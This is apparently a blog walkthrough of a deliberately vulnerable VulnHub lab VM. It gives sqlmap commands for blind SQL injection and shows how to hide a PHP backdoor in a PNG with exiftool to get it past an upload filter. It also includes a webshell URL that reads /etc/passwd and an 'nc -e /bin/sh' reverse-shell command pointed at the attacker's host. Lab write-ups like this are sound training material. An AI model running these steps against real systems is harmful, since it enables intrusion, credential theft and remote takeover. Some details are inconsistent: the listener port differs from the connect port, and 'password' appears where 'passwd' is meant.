Hack the Pentester Lab: from SQL injection to Shell II (Blind SQL Injection)

Hello friends!! Today we are going to solve another CTF challenge “From SQL injection to Shell II” and you can read part 1 form here. This VM is developed by Pentester Lab.  You can download it from here: https://www.vulnhub.com/entry/pentester-lab-from-sql-injection-to-shell-ii,69/
Install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and upload PHP webshell.
Level: Intermidate
Penetrating Methodologies
§  Network Scanning (Nmap)
§  Vulnerable to Blind Time-Base SQL Injection
§  Exploiting SQL Injection (SQLMAP)
§  Hiding web shell inside Image (exiftool)
§  Uploading Web shell
§  Spawning Shell (Netcat)

Walkthrough

The target holds 192.168.1.102 as network IP; now using nmap lets find out open ports.
nmap -A 192.168.1.102
Since port for HTTP is open, so we explored target IP in the web browser and welcome by My Awesome Photoblog web page. It contains some tags: home; test; ruxcon; 2010; all pictures; admin. Click on test.
The given URL: http://192.168.1.102/cat.php?id=1 will run sql query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding(‘) apostrophe at last of URL:
Unfortunately this page is not vulnerable to error base SQL injection as author already mention here you will learn “Blind SQL injection exploitation using time-based exploitation Gaining code execution using a PHP webshell”
Then I had used acunetix to scan the target which has declared the level of threat is high for blind sql injection.
Hence it is clear that exploit the target through sql injection.
And after little more research work I found the way to exploit it using sqlmap.
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” --dbs --dump-all--batch
If you remembered the title of web page was “An Awesome Photoblog” hence name of database must be photoblog.
Now let’s fetch entire data under photoblog database through following command:
sqlmap -u http://192.168.1.102/cat.php?id=1 --headers=”X-Forwarded-For: *” -D photoblog --dump-all--batch
Now try to use above credential to access administration console, again open target IP: 192.168.0.105 in browser and click on login tab and type login as admin and password as P4ssw0rd.
Congrats!!! The first task is completed.
Now last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.
I tried to upload php malicious file using .php extension; double extension .php.jpg; also used case sensitive extension like PHP, pHP but every time failed to upload backdoor and following web page gets open.
Then I use exiftool to bind a malicious php file which will generate a remote code execution vulnerability, once get uploaded. To perform this I downloaded an image “1.png” and copied simple-backdoor.php from this path: /usr/share/webshells/php/ on the desktop for binding it with downloaded image.
Now type command for exiftool to hide malicious code of php file inside the png image.
cd Desktop
exiftool “-comment<= simple-backdoor.php” 1.png
exiftool 1.png
As you can observe, the malicious code is hidden inside the image. 
Now I had browse 1.png to add it as new image which is our php webshell.
Our malicious file successfully uploaded on web server. You can see a new row is added as webshell php which contains our php backdoor, now click on backdoor.
Yuppie we have uploaded the image with hidden backdoor inside, now try execute it.
After inspecting its source code we found link uploaded image, now let’s try to open it.

As we knew the image contain a web shell that will allow remote code execution, therefore, after exploring above enumerated path, I try to get /etc/passwd file.  

http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=cat+/etc/password
And you can observe, we have successfully pulled the passwd file successfully, hence now can spwan victim’s shell through it.
Let’s run netcat listener in the terminal and execute netcat reverse connection for spawning web shell.
nc -lvp 1234
http://192.168.1.102/admin/uploads/1534177197.png/cmd.php?cmd=nc 192.168.1.105 6666 -e /bin/sh
Superb!!! We completed our last challenge also here we have spawned victim web shell.


0 comments:

Post a Comment